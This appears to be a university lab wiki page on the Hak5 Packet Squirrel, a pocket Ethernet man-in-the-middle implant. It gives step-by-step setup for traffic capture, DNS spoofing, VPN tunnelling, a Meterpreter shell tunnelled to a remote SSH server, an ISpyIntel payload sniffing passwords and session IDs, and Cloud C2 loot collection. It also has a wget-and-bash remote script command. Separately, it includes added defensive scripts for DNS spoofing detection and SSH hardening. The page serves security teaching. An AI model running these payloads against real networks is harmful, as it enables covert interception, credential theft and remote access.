Hak5 Packet Squirrel

From Embedded Lab Vienna for IoT & Security

Summary

[Figure: Packet Squirrel device]

The Packet Squirrel operates as an Ethernet man-in-the-middle device and comes preloaded with three payload scripts. The three attack modes are logging network traffic, spoofing and modifying DNS requests, and tunnelling traffic through an OpenVPN tunnel. These payloads can also be modified or exchanged for other scripts. Its stealthy pocket size allows it to be placed without being noticed, which can come in handy for penetration testers. Its low energy consumption makes it possible to power it from a battery pack for over a week. The Packet Squirrel can also be combined with the Hak5 Cloud C2, a command and control server specifically for Hak5 devices.

The device has the following characteristics:

  1. Dimensions: 50 x 40 x 15 mm, small and lightweight at 24 grams
  2. Consumption: 0.12 A via the Micro-USB port
    1. Can be run with a battery pack
  3. Ports: 2 x RJ45-Ethernet-Port | 1 x USB-Port for a flash drive | Micro-USB-Port for power supply
  4. OS: Runs a Linux platform with root access and common network utilities
  5. Hardware
    1. LED indicating the status of the device
    2. Payload Selection Switch to choose the respective payload
    3. Scriptable push-button to stop payloads with ease

Possible attacks with the Packet Squirrel

The man-in-the-middle attack (MITM) is a well-known cyber security attack in which an attacker interposes themselves, physically or, nowadays more often, logically, in the communication between two or more network targets. The attacker thereby gains complete control over the data traffic and can read, store, block, manipulate or delete it. The crux of the attack is that the attacker poses as the respective counterpart to each communication partner.

A MITM attack can be realized by means of another attack called spoofing. Spoofing is when an attacker pretends to be someone known to an individual or network host in order to access confidential information. Technically, spoofing can occur in many ways, for example as ARP, DHCP or DNS spoofing.

Community

Hak5 not only makes it easy to run the payloads described below by means of the switch on the side of the device, but also fosters a community around all of its devices.

The Hak5 website provides a way to submit self-made payloads and to ask questions in a forum. To promote the development of new payloads and to reward creativity, effort and collaboration, Hak5 lets you submit a payload to the “Hak5 Payload Awards” to receive a monetary reward of $2,000. The winner is chosen yearly by community vote.

Through Hak5’s GitHub account, payloads are made publicly available and can be downloaded or cloned from the respective repository.

Description

[Figure: SSH connect]
[Figure: spoofhost file]
[Figure: Spoofed browser warning]

The Packet Squirrel has a switch to choose between the three payloads (logging a tcpdump capture, DNS spoofing and VPN tunnelling) or Arming Mode.

In Arming Mode (switch in the 4th position, nearest to the USB port) you can access the device with ssh root@172.16.32.1 and the password hak5squirrel. For this, the Packet Squirrel acts as a DHCP server. If you don't get an IP address, manually configure an IP from the 172.16.32.0/24 network on your Ethernet interface. Arming Mode is indicated by a blue blinking LED and allows you to configure the different payloads.

It is also possible to gain SSH access to the device during the attack modes, using the IP address of the outgoing Ethernet interface.

Basic Cable Setup

  1. Plug the victim's Ethernet cable into the "Ethernet In" port
  2. Plug the gateway Ethernet cable into the "Ethernet Out" Port
  3. Power the device by plugging in the power cable

Firmware Upgrade

Shipped devices come with firmware version 1.0, which can be seen in the VERSION file in the Packet Squirrel's root folder. The current version 3.2 can be downloaded from the Hak5 website.

The file has to be named upgrade-version.bin (where version stands for the version number) and copied to the root directory of an NTFS- or EXT4-formatted USB drive.

Plug the USB drive into the Packet Squirrel and set the selection switch to Arming Mode. Then power on the Packet Squirrel.

The upgrade process takes 5 minutes and is indicated by a solid red or blue LED. When the firmware upgrade is finished, the Packet Squirrel reboots into Arming Mode, indicated by a blue blinking LED.

Then you can connect again with SSH and verify the new version, shown in Figure "SSH connect".

Manual upgrade

It is also possible to manually upgrade the firmware of the Packet Squirrel by:

  1. Download the latest firmware from the website linked above and verify the checksum
  2. Switch into “Arming Mode” and power on the device
  3. Use SCP to transfer the file to the Packet Squirrel's /tmp directory, for example: scp upgrade-x.x.bin root@172.16.32.1:/tmp/
  4. Use SSH (command: ssh root@172.16.32.1) to connect to the Packet Squirrel's bash prompt and run the sysupgrade command (sysupgrade -n /tmp/upgrade-x.x.bin) to start the firmware update
  5. The process may take 5-10 minutes. Do NOT unplug the device during the process, otherwise the device could become inoperable.

Formatting the USB-Stick

The Hak5 Packet Squirrel can only operate with a USB disk that is formatted with an NTFS or EXT4 file system.

NTFS (New Technology File System) is a proprietary journaling file system developed by Microsoft. It offers access control at file level, greater data integrity through journaling, and is not limited to a file size of 4 GB as FAT is. Formatting is performed with the following steps:

  1. On a Windows machine:
    1. Open File Explorer
    2. Locate your USB stick in the left pane
    3. Select “Format”
    4. Set NTFS as the file system using the drop-down, tick “Quick Format” and click “Start”

EXT4 (fourth extended file system) was developed for the Linux kernel and, like NTFS, is a journaling file system. Windows cannot format a USB stick to EXT4 directly, so a third-party tool is needed. A USB stick is formatted to EXT4 using the following steps:

  1. On a Windows-machine:
    1. Download and install DiskGuard
    2. Select your drive from the left bar
    3. Select the “Format”-button at the top bar
    4. Select the wanted file system “EXT4” from the drop down menu
    5. Click “Format”

Payloads

Payloads can be stored on an external USB disk or in the device's internal memory. On boot the device gives priority to payloads on the USB disk; payloads existing in the internal memory are then overridden. If no USB disk is available, the payloads stored in the internal memory are executed. Payloads in the internal memory are stored in /root/payloads and need to be called switch1, switch2 and switch3; payloads on a USB disk should be stored in /payloads/ and named accordingly.

Logging Network Traffic

This mode creates TCP/UDP dumps and saves them on the USB drive for later analysis. Just follow these steps:

  1. A USB stick with an NTFS file system needs to be plugged into the USB-A port before the Squirrel is powered up.
  2. Set the switch to the first position (nearest to the micro-USB power input).
  3. Connect the victim's Ethernet cable to the Ethernet port on the same side as the USB power connector and connect the gateway Ethernet cable to the other port.
  4. Plug in the power cable and wait for the one-minute start-up sequence. The device can be powered either by the victim machine or by a USB power bank.
  5. Traffic is being captured once the LED starts blinking yellow. If instead the LED cycles through red, green and blue, the USB stick has the wrong file system.
  6. Stop the capture by pressing the button. The device then takes a few seconds to write the tcpdump file to the USB storage. As soon as the LED glows red, saving has finished and you are good to go.
  7. You can now analyse the captured pcap file, located in \loot\tcpdump, with Wireshark.

After that, the connection through the Packet Squirrel is shut down. To allow the client to connect to the network again, the Packet Squirrel has to be rebooted.

DNS Spoofing Mode

This mode answers the client's DNS requests with spoofed entries to redirect traffic to other IP addresses.

  1. For this mode we start in Arming Mode (switch in the fourth position).
  2. After gaining access via SSH, change to the DNS spoofing directory with cd /payloads/switch2.
  3. There the spoofed domain names are defined by editing the file spoofhost with nano spoofhost.
  4. In the file, add entries like address=/myspoofdomain.at/194.232.104.140, as shown in figure "spoofhost file". The example IP belongs to orf.at. If all requests should be redirected to this IP address, a # is used in place of the domain (address=/#/194.232.104.140). Note that the IP address of orf.at must be given literally; specifying the hostname orf.at itself does not work, as the Packet Squirrel does not resolve it to an IP.
  5. Unplug the Packet Squirrel and move the switch to the second position.
  6. Plug it in and wait until the start-up sequence has finished and the LED starts blinking yellow.

When browsing to the spoofed domain, the request is redirected to the given IP. As shown in figure "Spoofed browser warning", browsers show certificate alerts because the domain and the certificate do not match. The mode can still be used against other applications that use domain names without such validation.
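As an added example (not part of the original page or of the Packet Squirrel's own code), the following Python script shows how a defender on the client side can detect the two redirection forms described in this section and under "Possible attacks" above: the per-name address=/domain/ip entry, by comparing observed DNS answers with a trusted baseline, and the wildcard address=/#/ip entry, by its footprint of many unrelated names resolving to one address. The passive sensor, the baseline and all names and TEST-NET addresses are constructed assumptions; 194.232.104.140 is the orf.at address from the spoofhost example.

```python
"""Detect DNS redirection from the client side (added example).

Assumes a passive sensor that records (queried name, answered IPv4 address)
pairs on the client side of the suspect path, and a trusted baseline obtained
out of band (for example from a resolver reached over a different path).
"""
from collections import defaultdict

# Constructed sample: answers as seen by a client behind the device. The wildcard
# entry makes unrelated names collapse onto 194.232.104.140 (orf.at on the page).
OBSERVED = [
    ("myspoofdomain.at", "194.232.104.140"),
    ("orf.at", "194.232.104.140"),
    ("example.test", "194.232.104.140"),
    ("mail.example.test", "194.232.104.140"),
    ("update.example.test", "194.232.104.140"),
    ("intranet.example.test", "198.51.100.7"),
    ("wiki.example.test", "198.51.100.8"),
]

# Constructed trusted baseline: name -> set of legitimate addresses (TEST-NET ranges).
TRUSTED = {
    "orf.at": {"194.232.104.140"},
    "example.test": {"192.0.2.10"},
    "mail.example.test": {"192.0.2.25"},
    "update.example.test": {"192.0.2.30", "192.0.2.31"},
    "intranet.example.test": {"198.51.100.7"},
    "wiki.example.test": {"198.51.100.8"},
}


def mismatches(observed, trusted):
    """Return (name, observed_ip, expected_ips) for answers that disagree with the baseline.

    Names without a baseline entry (myspoofdomain.at here) cannot be judged and are
    skipped. A per-name comparison catches selective address=/name/ip redirections.
    """
    findings = []
    for name, ip in observed:
        expected = trusted.get(name)
        if expected is not None and ip not in expected:
            findings.append((name, ip, sorted(expected)))
    return findings


def sinkholes(observed, min_names=3):
    """Return {ip: [names]} for addresses that answer at least min_names distinct names.

    This is the footprint of the wildcard address=/#/ip entry. Shared hosting and
    CDNs also map many names to one address, so treat hits as leads to confirm
    with mismatches() rather than as proof on their own.
    """
    names_by_ip = defaultdict(set)
    for name, ip in observed:
        names_by_ip[ip].add(name)
    return {ip: sorted(names) for ip, names in names_by_ip.items() if len(names) >= min_names}


if __name__ == "__main__":
    for name, ip, expected in mismatches(OBSERVED, TRUSTED):
        print(f"MISMATCH {name}: got {ip}, trusted answer {expected}")
    for ip, names in sinkholes(OBSERVED).items():
        print(f"SINKHOLE {ip} answers {len(names)} names: {', '.join(names)}")
```

Run on the constructed sample, the script reports three mismatched names and flags 194.232.104.140 as a sinkhole for five names; orf.at itself is not reported, because the spoofed answer equals the legitimate one, which is exactly why the per-name comparison and the many-names-to-one-address heuristic are used together.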

OpenVPN Mode

[Figure: OpenVPN Tunneling Mode]
[Figure: OpenVPN Access Mode]

An existing VPN server from freeopenvpn.org can be used for Tunnel Mode. To use Access Mode, a separate VPN server must be set up. This requires a server with a static IP address to which you have full access for configuration. As part of a project at the FH Campus Wien, it makes sense to use the FH infrastructure. The hardware requirements for the server are very low at 2 CPUs and 2 GB RAM. OpenVPN (OVPN) was used on the self-hosted server; it offers two free connections, which are sufficient in this case.

  1. Download the OVPN access certificate.
  2. Set the Packet Squirrel to Arming Mode and connect to its shell.
  3. Copy the certificate with scp user@server:downloadfolder/filename.ovpn /root/payloads/switch3/config.ovpn
  4. Change to the directory with cd /root/payloads/switch3/
  5. Edit config.ovpn so that line 30 reads auth-user-pass credentials.txt
  6. Create a credentials file with nano credentials.txt and add the two lines:
    1. freeopenvpn
    2. <the displayed password>
  7. Before starting the VPN, choose the VPN mode:
    1. Open payload.sh
    2. Set For_Clients= to
      1. 0 for Access Mode
      2. 1 for Tunneling Mode
  8. Now set the switch to the third position and unplug and replug the power.
  9. You are good to go if the yellow LED starts to flash after the boot-up sequence.

Access Mode

Access Mode allows the Squirrel to be reached over SSH from the VPN network once the connection is established. For this you also have to install an OpenVPN client on another device, such as an Ubuntu VM. From this VM you can establish a tunnel to the VPN server and from there connect via SSH to the Packet Squirrel.

The command ifconfig tun0 issued at the Packet Squirrel's shell shows the following output:

tun0 
     Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
     inet addr:192.168.231.245 P-t-P:192.168.231.245 Mask:255.255.255.0
     UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1
     RX packets:12 errors:0 dropped:0 overruns:0 frame:0
     TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
     collisions:0 txqueuelen:100
     RX bytes:1404 (1.3 KiB) TX bytes:608 (608.0 B)

Access Mode can be used to reach a private network from outside.

Tunneling Mode

Tunneling Mode encapsulates all traffic and sends it to the VPN server, from where it is forwarded to the internet. VPN tunnelling allows users to disguise their IP address; you can check your current public IP address with ipchicken.com.

You can also install a simple OpenVPN server on a Linux machine with wget https://git.io/vpn -O openvpn.sh && bash openvpn.sh and pressing Enter 6 times. Then copy the generated client.ovpn file to the Packet Squirrel's /root/payloads/switch3 folder and restart it with the switch in the third position.

Meterpreter-via-SSH

[Figure: Packet Squirrel payload Meterpreter-via-SSH settings]

This payload starts the Packet Squirrel in NAT mode and waits for user input. When the button is pressed, the payload connects to a remote SSH server and creates a local port tunnel. It then launches a Meterpreter shell over the tunnel. The intent is to hide the Meterpreter network traffic behind legitimate SSH activity. You can download this payload from the official Hak5 GitHub.

Getting Started

Copy the payload to the Packet Squirrel into the desired switch folder. Then edit the script to configure your server options:

  • SSH_USER - username on the remote SSH server
  • SSH_HOST - IP address of the remote SSH server
  • MSF_PORT - Meterpreter port (see note below)

Note: If you changed the default Meterpreter port, don't forget to change it on the Metasploit side as well.

Generate SSH Key on Squirrel

Now you have to generate an SSH key pair (use the default location and an empty passphrase) on your Packet Squirrel:

root@squirrel:~# ssh-keygen

Allow Squirrel on SSH Server

Then copy the contents of /root/.ssh/id_rsa.pub from the Packet Squirrel into the SSH server's authorized_keys file:

user@server:~# mkdir ~/.ssh
user@server:~# echo 'paste id_rsa.pub contents inside this quote' > ~/.ssh/authorized_keys

Run Metasploit with Resource

msf@server:~# msfconsole -r server.rc

LED Definitions

  1. Configure NETMODE
    • Solid Magenta
  2. Connect to SSH Server
    • SUCCESS - Blink Amber 5 Times
    • FAIL - Blink Red 2 Times
  3. Launch meterpreter
    • SUCCESS - Blink Cyan 1 Time
    • FAIL - Blink Red 1 Time

Hardening Recommendations

  1. Use an account with limited privileges for SSH access on the server.
  2. Use a dedicated account for the Packet Squirrel device (audit its usage with the SSH access logs).
  3. Disable PasswordAuthentication in sshd_config on the server.
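The three recommendations can be checked mechanically. The following Python script, added here as an example rather than taken from the page or from the payload, parses the global section of an OpenSSH sshd_config and reports which of the three points are not met. It assumes OpenSSH's rule that the first occurrence of a keyword wins and that a Match line begins a conditional section. The account name squirrel and both configuration texts are constructed; the hardened one shows settings that satisfy all three points, with a Match block that limits that account to the port forwarding the payload needs (an assumption about what the account should be allowed to do).

```python
"""Audit an sshd_config against the hardening recommendations above (added example)."""

# Constructed: a permissive configuration that violates all three recommendations.
WEAK_CONFIG = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PubkeyAuthentication yes
"""

# Constructed: dedicated unprivileged account, key-only login, root login disabled,
# verbose logging so key fingerprints appear in the auth log for auditing. The
# Match block restricts the account to TCP forwarding without a shell or X11.
HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
AllowUsers squirrel
LogLevel VERBOSE

Match User squirrel
    AllowTcpForwarding yes
    X11Forwarding no
    PermitTTY no
"""


def parse_global_options(text):
    """Return {keyword_lower: first_value} for the global section of an sshd_config.

    Keywords are case-insensitive and sshd applies the first value it sees for a
    keyword. Everything from the first Match line on is conditional and ignored here.
    """
    options = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            break
        options.setdefault(key, value)  # first occurrence wins
    return options


def audit_sshd_config(text, device_user):
    """Return a list of findings; an empty list means all three recommendations are met."""
    opts = parse_global_options(text)
    findings = []
    # Recommendation 3: no password logins, keys only (sshd defaults to 'yes' when unset).
    if opts.get("passwordauthentication", "yes").lower() != "no":
        findings.append("PasswordAuthentication is not 'no'")
    if opts.get("pubkeyauthentication", "yes").lower() != "yes":
        findings.append("PubkeyAuthentication is disabled")
    # Recommendation 1: a limited-privilege account, so the device must not log in as root.
    if opts.get("permitrootlogin", "").lower() != "no":
        findings.append("PermitRootLogin is not 'no'")
    # Recommendation 2: a dedicated account, explicitly allow-listed so that its
    # sessions stand out in the access logs and no other account can use the key.
    allowed = opts.get("allowusers", "").split()
    if device_user not in allowed:
        findings.append(f"AllowUsers does not list the dedicated account '{device_user}'")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{label}: {audit_sshd_config(cfg, 'squirrel') or ['ok']}")
```

The audit deliberately reads only the global section: options inside a Match block apply conditionally, so a PasswordAuthentication no placed there would not protect every other account on the server.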

ISpyintel

[Figure: Packet Squirrel payload ISpyIntel settings]

This payload automates gathering various reconnaissance data on whatever passes between its Ethernet ports. You can download this payload from the official Hak5 GitHub. Note: this payload requires a USB stick to store loot.

Setup

  1. Edit the config variables at the top. The main variables are:
    1. lootPath="/mnt/loot/intel" # Path to loot
    2. mode="TRANSPARENT" # Network mode we want to use
    3. interface="br-lan" # Interface to listen on
  2. Copy payload.sh into the ~/payloads/switch folder you wish to deploy on.
  3. Connect it to a target machine with access to the LAN.
  4. Set switch to the spot and power up.
  5. Leave, get coffee, take a nap while everything is recorded and parsed for future use.
  6. When done; hit the button. The LED will rapidly flash white to let you know it is finishing up.
  7. When all is done the LED will just go blank. It is now safe to unplug and go about your day.

Tasks that are started

  • tcpdump - records every packet that was sent and received
  • urlsnarf - collects all websites that were visited
  • dsniff - attempts to acquire passwords and what not
  • ngrep - on ports 80 and 21 with the filter for common password fields
  • ngrep - on ports 80 and 21 with the filter for common session id fields
  • log.txt - logs the progress of the payload for troubleshooting

Clean Up

Once the button is pressed, the payload automatically parses the tcpdump log file for the following items and stores the results in separate files. As this process can take some time, the LED changes to a rapid white blink, letting you know the button press was received and the payload is shutting down.

  • ipv4found.txt contains a unique list of all IPv4 addresses that appear in the pcap file
  • maybeEmails.txt is a very loose search for possible email addresses that crossed the wire in plain text

Creating your own Payloads

Ducky Script is Hak5's payload language and consists of several simple commands specific to the Packet Squirrel hardware on top of bash. The basic Ducky Script commands are described below and include NETMODE, LED, BUTTON and SWITCH.

The Packet Squirrel allows us to create our own attack payloads by loading them onto the USB stick and naming them switch1 to switch3. Payloads can be written in Python, bash or PHP. For Python and bash it is important to use the interpreter directive (Python: #!/usr/bin/python, bash: #!/usr/bin/bash). Bash scripts can use the following pre-installed tools: openvpn, autossh, tcpdump, meterpreter-https, cron, nmap, ncat-ssl, ncat, sshfs and wget.

The featured Squirrel Script offers the following additional commands:

  • NETMODE

specifies which network mode the Packet Squirrel uses and how traffic is routed.

Command               Description
NETMODE BRIDGE        Creates a bridge between the IN and OUT Ethernet interfaces, with an own IP address for the Packet Squirrel
NETMODE TRANSPARENT   Also creates a bridge between the interfaces, but without an own IP address
NETMODE NAT           The Packet Squirrel gets an IP address from the target network; the client gets an IP from the Packet Squirrel
NETMODE VPN           Same as NAT, with a VPN interface for client tunneling
NETMODE CLONE         Clones the MAC address of the target client and uses it to connect to the LAN
  • LED

With this command the multi-colour LED can be controlled.

Further information regarding the LED, its colours, patterns and states can be found here.

Possible configurations   Description
LED Colors                red, green, blue, yellow, cyan, magenta, white
LED Patterns              SOLID, SLOW, FAST, SINGLE, DOUBLE, TRIPLE, SUCCESS, 1-10000
LED State                 SETUP, FAIL, ATTACK, STAGE, SPECIAL, CLEANUP, FINISH
  • BUTTON

The BUTTON command pauses the payload until the hardware button is pressed or a specified time has passed.

Further information regarding the Ducky Script’s “Button” command like its return value, possible ways of configuring the wait time, LED color during the pause as well as the option to suppress the LED can be found here.

  • SWITCH

The SWITCH command returns the current position of the hardware payload selection switch. Output is "switch1", "switch2", "switch3" or "switch4".

Example and Best Practices

[Figure: C2 server start]
[Figure: C2 Dashboard]
[Figure: C2 Packet Squirrel]

As shown below, payloads should begin with comments specifying the name of the payload, a description, the author(s), the target, special requirements, category, netmodes and the LED status.

Configurable options should be placed on the top of the payload file.

The LED should be used for the common payload states rather than with unique pattern combinations. An LED command should precede the NETMODE command, indicating a specific state such as SETUP, or FAIL if specific conditions are not met. If a payload reaches the FINISH state, the Packet Squirrel is safe to power off.

Here is an example for the usage of Squirrel Script.

# Title: Caternet
# Author: Hak5Darren
# Version: 1.0
# Description: Forwards all traffic to local webserver hosting cat photos.
# Props: In loving memory of Hak5Kerby

LED SETUP
NETMODE NAT
echo "address=/#/172.16.32.1" > /tmp/dnsmasq.address
/etc/init.d/dnsmasq restart

LED ATTACK
iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53
python -m SimpleHTTPServer 80

For more information go to the hak5.org webpage.

With Cloud C2

The Hak5 Cloud C2 is a command and control server for Hak5 devices. Installation and start-up are shown in figure "C2 server start". By browsing to the configured address you can log in to the dashboard, shown in figure "C2 Dashboard".

To connect the Packet Squirrel to your Cloud C2, click the plus button in the lower right corner and choose the device. On the dashboard, open the added device and click Setup, as shown in figure "C2 Packet Squirrel". Then copy the downloaded file to the Packet Squirrel's /etc folder and reboot it. In the Overview tab you can also Edit, Reboot, Wipe and Remove your device.

In the Clients tab you can see all clients that were connected to your Packet Squirrel, with hostname, MAC and IP address. In the Loot tab you can open the current loot from your Packet Squirrel directly on your C2 server. And in the Terminal tab you can open an SSH session to your device.

Used Hardware

Packet Squirrel + Field Guide
